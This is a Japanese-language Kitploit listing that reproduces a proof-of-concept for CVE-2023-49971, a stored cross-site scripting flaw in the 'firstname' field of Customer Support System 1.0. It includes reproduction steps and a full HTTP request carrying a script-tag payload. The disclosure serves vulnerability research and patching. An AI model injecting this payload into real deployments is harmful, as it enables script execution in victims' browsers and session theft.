Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-49971 — Customer Support System 1.0 - (XSS) クロスサイトスクリプティング脆弱性 "customer_list" の "firstname" パラメータに存在 | Kitploit
ツール/GitHubGitHub/geraldoalcantara/cve-2023-49971
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubgeraldoalcantara/cve-2023-49971

CVE-2023-49971

Customer Support System 1.0 - (XSS) クロスサイトスクリプティング脆弱性 "customer_list" の "firstname" パラメータに存在

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-49971

Customer Support System 1.0 - "customer_list" ページの "firstname" フィールド/パラメータにおけるクロスサイトスクリプティング (XSS) 脆弱性

説明: Customer Support System 1.0 は、ストアド XSS に対して脆弱です。XSS 脆弱性は Customer Support System のバージョン 1 に存在します。悪意のある攻撃者は、顧客の編集または作成時に "firstname" フィールド/パラメータを介して JavaScript コードを挿入できます。このコードは、ページ "/customer_support/index.php?page=customer_list" にアクセスするたびに実行されます。

脆弱な製品バージョン: Customer Support System 1.0 CVE 作成者: Geraldo Alcântara 日付: 28/11/2023 確認日: 19/12/2023 CVE: CVE-2023-49971 テスト環境: Windows

再現手順:

  1. アプリケーションにログインします。
  2. 既存の顧客を編集するには "/customer_support/index.php?page=customer_list" に移動し、新しい顧客を作成するには "/customer_support/index.php?page=new_customer" に移動します。
  3. 顧客を作成または編集し、悪意のあるペイロードを "firstname" フィールド/パラメータに挿入します。
  4. ペイロード:

リクエスト:

root@kitploit:~
POST /customer_support/ajax.php?action=save_customer HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------212391604122778812451614149575
Content-Length: 1149
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_customer
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=abige9ar0b1bi3qcf9mkv258o3

-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="id"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="firstname"

teste</dt></b><script>alert(document.domain)</script>
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="middlename"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="lastname"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="contact"

210
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="address"

asdasd
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="password"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="cpass"

xss
-----------------------------212391604122778812451614149575--

発見者/クレジット:
Geraldo Alcântara

ツールをダウンロード